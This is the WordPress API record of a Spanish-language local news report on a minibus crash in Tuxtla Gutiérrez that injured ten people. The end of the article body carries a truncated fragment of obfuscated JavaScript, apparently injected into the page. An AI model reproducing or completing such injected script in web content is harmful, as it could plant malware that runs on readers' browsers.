{"id":9849,"date":"2023-05-02T02:07:06","date_gmt":"2023-05-02T02:07:06","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9849"},"modified":"2023-05-02T02:07:07","modified_gmt":"2023-05-02T02:07:07","slug":"colectivazo-en-la-zona-oriente-de-tuxtla-deja-10-heridos","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9849","title":{"rendered":"Colectivazo en la zona Oriente de Tuxtla deja 10 heridos"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"720\" height=\"541\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1682992954244.jpg\" alt=\"\" class=\"wp-image-9850\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1682992954244.jpg 720w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/FB_IMG_1682992954244-300x225.jpg 300w\" sizes=\"auto, (max-width: 720px) 100vw, 720px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudadano, 1 de Mayo del 2023. Tuxtla Guti\u00e9rrez.- Un choque entre una unidad de transporte p\u00fablico en la modalidad de colectivo y una camioneta particular en la zona Oriente de Tuxtla dej\u00f3 un saldo de diez heridos.<\/p>\n\n\n\n<p>De acuerdo con los reportes oficiales, este choque ocurri\u00f3 este lunes por la ma\u00f1ana cuando el colectivo tipo Urvan de la ruta 128 con n\u00famero econ\u00f3mico 05 circulaba sobre la de Norte a Sur en la calle Ixtapatongo de la colonia Las Palmas, cuando fue impactada por una camioneta Dodge tipo Durango que se desplazaba con preferencia de Oriente a Poniente en la Avenida Presa Cecilio del Valle.<\/p>\n\n\n\n<p>Por el golpe la Urvan. Sali\u00f3 proyectada, y resultaron al menos 10 pasajeros lesionados los cuales fueron atendidos por param\u00e9dicos de la Cruz Roja y tres de ellos fueron trasladados a un hospital particular para ser valorados.<\/p>\n\n\n\n<p>El conductor del colectivo di\u00f3 a conocer que, en este lugar existe un disco de prohibici\u00f3n para seguir el paso que no respet\u00f3 el conductor particular.<\/p>\n\n\n\n<p>Los involucrados no llegaron a un acuerdo, y las unidades fueron puestas a disposici\u00f3n del Ministerio P\u00fablico para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudadano, 1 de Mayo del 2023. Tuxtla Guti\u00e9rrez.- Un choque entre una unidad de transporte p\u00fablico en la modalidad de colectivo y una camioneta particular en la zona Oriente de Tuxtla dej\u00f3 un saldo de diez heridos. De acuerdo con los reportes oficiales, este choque ocurri\u00f3 este lunes por la ma\u00f1ana cuando &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9850,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-9849","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9849"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9849\/revisions"}],"predecessor-version":[{"id":9851,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9849\/revisions\/9851"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9850"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}